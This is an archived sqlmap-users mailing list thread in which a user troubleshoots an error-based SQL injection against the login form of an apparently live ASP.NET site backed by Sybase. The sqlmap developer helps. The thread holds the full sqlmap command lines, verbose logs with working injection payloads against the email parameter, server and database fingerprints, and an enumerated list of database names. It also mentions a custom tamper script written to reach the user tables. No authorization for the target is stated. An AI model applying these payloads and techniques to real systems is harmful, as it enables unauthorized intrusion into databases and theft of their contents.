Strange thing is that you are not getting anything with --parse-errors as
you are dealing with a "missing database" problem inlined with error-based
technique.
Can you please send a traffic file (if you want you can send it privately
to me) for that same run (where you've used --parse-errors)?
Bye
On Tue, Mar 25, 2014 at 7:55 PM, Richard Whitcroft <rwhitcr...@gmail.com>wrote:
> Sure. The --parse-errors switch doesn't seem to produce anything
> additional? I added -v3 just in case.
>
> --
> $ python sqlmap.py ... --dbms=sybase --batch --technique=E --threads=8
> --fresh-queries -D ENERGY_MASTER --tables --parse-errors -v3
>
> sqlmap/1.0-dev-59d667d - automatic SQL injection and database takeover
> tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 14:46:47
>
> [14:46:47] [DEBUG] cleaning up configuration parameters
> [14:46:47] [DEBUG] setting the HTTP timeout
> [14:46:47] [DEBUG] setting the HTTP method to POST
> [14:46:47] [DEBUG] creating HTTP requests opener object
> [14:46:47] [DEBUG] forcing back-end DBMS to user defined value
> [14:46:47] [INFO] testing connection to the target URL
> [14:46:47] [DEBUG] declared web page charset 'utf-8'
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Place: POST
> Parameter: ctl00$ContentPlaceHolder1$SignInEmailAddressTextbox
> Type: error-based
> Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING
> clause
> Payload: ...
> Vector: AND [RANDNUM]=CONVERT(INT,(SELECT
> '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
> ---
> [14:46:47] [INFO] testing Sybase
> [14:46:47] [PAYLOAD] rw81j...@gmail.com' AND 6746=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
> (@@transtate=@@transtate) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'eeea'='eeea
> [14:46:48] [WARNING] reflective value(s) found and filtering out
> [14:46:48] [DEBUG] performed 1 queries in 0.47 seconds
> [14:46:48] [INFO] confirming Sybase
> [14:46:48] [PAYLOAD] rw81j...@gmail.com' AND 6332=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT (CASE WHEN
> (suser_id()=suser_id()) THEN CHAR(49) ELSE CHAR(48)
> END))+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'lqSO'='lqSO
> [14:46:48] [DEBUG] performed 1 queries in 0.45 seconds
> [14:46:48] [INFO] the back-end DBMS is Sybase
> web server operating system: Windows Vista
> web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Sybase
> [14:46:48] [INFO] fetching tables for database: ENERGY_MASTER
> [14:46:48] [PAYLOAD] rw81j...@gmail.com' AND 5371=CONVERT(INT,(SELECT
> CHAR(113)+CHAR(118)+CHAR(104)+CHAR(114)+CHAR(113)+(SELECT
> ISNULL(CONVERT(VARCHAR(4000),COUNT(*)),CHAR(32)) FROM (SELECT name FROM
> ENERGY_MASTER..sysobjects WHERE type IN (CHAR(85))) AS
> Legi)+CHAR(113)+CHAR(116)+CHAR(108)+CHAR(112)+CHAR(113))) AND 'idET'='idET
> [14:46:49] [DEBUG] performed 1 queries in 0.46 seconds
> [14:46:49] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> No tables found
> [14:46:49] [INFO] fetched data logged to text files under
> '/opt/sqlmap/output/xxx'
>
> [*] shutting down at 14:46:49
> --
>
> $ python sqlmap.py ... --dbs
>
> [14:50:13] [INFO] testing Sybase
> [14:50:14] [WARNING] reflective value(s) found and filtering out
> [14:50:14] [INFO] confirming Sybase
> [14:50:14] [INFO] the back-end DBMS is Sybase
> web server operating system: Windows Vista
> web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.0
> back-end DBMS: Sybase
> [14:50:14] [INFO] fetching database names
> [14:50:14] [INFO] retrieved: 13
> [14:50:14] [INFO] fetching number of distinct values for column 'nRfs.name'
> [14:50:15] [INFO] retrieved: 13
> [14:50:15] [INFO] using column 'nRfs.name' as a pivot for retrieving row
> data
> [14:50:15] [INFO] retrieved: AR1
> [14:50:16] [INFO] retrieved: AR10
> [14:50:16] [INFO] retrieved: AR100TST
> [14:50:17] [INFO] retrieved: AR15
> [14:50:17] [INFO] retrieved: AR710
> [14:50:18] [INFO] retrieved: AR710TST
> [14:50:18] [INFO] retrieved: ENERGY_MASTER
> [14:50:19] [INFO] retrieved: master
> [14:50:20] [INFO] retrieved: model
> [14:50:20] [INFO] retrieved: olympus
> [14:50:21] [INFO] retrieved: sybsystemdb
> [14:50:21] [INFO] retrieved: sybsystemprocs
> [14:50:22] [INFO] retrieved: tempdb
>
>
>
> On 25 March 2014 14:22, Miroslav Stampar <miroslav.stam...@gmail.com>wrote:
>
>> Hi.
>>
>> Can you please copy/paste the console output you get for sqlmap run with:
>>
>> python sqlmap.py ... -D ENERGY --tables --parse-errors
>>
>> Also, for:
>>
>> python sqlmap.py ... --dbs
>>
>> Bye
>> On Mar 25, 2014 7:16 PM, "les paul" <rw81j...@gmail.com> wrote:
>>
>>> Hi all,
>>>
>>> I'm running into trouble with sqlmap against a Sybase db. Here's the
>>> fingerprint:
>>>
>>> Adaptive Server Enterprise/15.0.3/EBF 17770 ESD#4/P/x86_64/Enterprise
>>> Linux/ase1503/2768/64-bit/FBO/Thu Aug 26 09:54:27 2010
>>>
>>> The technique I'm using is error-based through a POST to a vulnerable
>>> .aspx page. I am able to enumerate the master db, but not the user tables,
>>> which are what I want.
>>>
>>> $ ./sqlmap.py -u xxx -d "huge_asp_net_viewstate&theparam=blah"
>>> --dbms=sybase --threads=8 --batch --technique=E -D master --tables
>>>
>>> This produces 58 tables, mostly sys* and some mon* which seem standard.
>>> I can dump the sysobjects table using -D and -T, etc.
>>>
>>> The web app is querying a database we'll call "ENERGY". If I try to "-D
>>> ENERGY --tables", I get "No tables found, try using --hex or --no-cast
>>> blahblah" (which don't work).
>>>
>>> I used -v4 to look closely at the requests, and see sqlmap is prefixing
>>> the tablenames with "ENERGY.dbo." or sometimes just "ENERGY..", which after
>>> experimenting I found doesn't work, so I wrote a small tamper script to
>>> strip off "ENERGY.." and "ENERGY.dbo." - this lets me pull the column names
>>> from the user tables (type='U'), but I'm still not able to get at the
>>> actual data/rows in the tables.
>>>
>>> I know it must be possible because the web app is definitely querying
>>> the tables to validate a login (this is a sqli vuln in a login form, heh).
>>>
>>> I'm not even sure this is really a bug in sqlmap - maybe something odd
>>> in the way the database is built or something. I just thought I'd ask in
>>> case anyone has had success using sqlmap against a similar Sybase db and
>>> has some tips or suggestions.
>>>
>>> Thanks for reading - I can provide more information if anyone's
>>> interested.
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Learn Graph Databases - Download FREE O'Reilly Book
>>> "Graph Databases" is the definitive new guide to graph databases and
>>> their
>>> applications. Written by three acclaimed leaders in the field,
>>> this first edition is now available. Download your free book today!
>>> http://p.sf.net/sfu/13534_NeoTech
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>
--
Miroslav Stampar
http://about.me/stamparm
------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
